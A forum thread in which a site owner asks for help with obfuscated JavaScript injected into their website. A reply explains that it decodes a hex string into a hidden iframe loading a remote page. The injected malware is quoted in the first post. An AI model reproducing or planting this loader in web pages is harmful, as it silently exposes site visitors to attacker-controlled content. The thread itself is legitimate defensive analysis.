Anonymous javascript code

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
arifsor
Forum Newbie
Posts: 1
Joined: Fri Jul 18, 2008 2:22 am

Anonymous javascript code

Post by arifsor »

Hi,
I have made my site XSS proofed but still the following code is being embedded in my site

var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, ""))

Any Idea? is this the hosting server issue?
Please help
dml
Forum Contributor
Posts: 133
Joined: Sat Jan 26, 2008 2:20 pm

Re: Anonymous javascript code

Post by dml »

The code isn't all there, and it's not executable by itself, but it looks like it's obfuscating strings by using a hex representation interspersed with garbage. The code removes the garbage, converts back into a string, and inserts the string into your document. One of the obfuscated strings is the source of an iframe pointing to top100-counter.com, so I assume that's getting inserted into your page.
Post Reply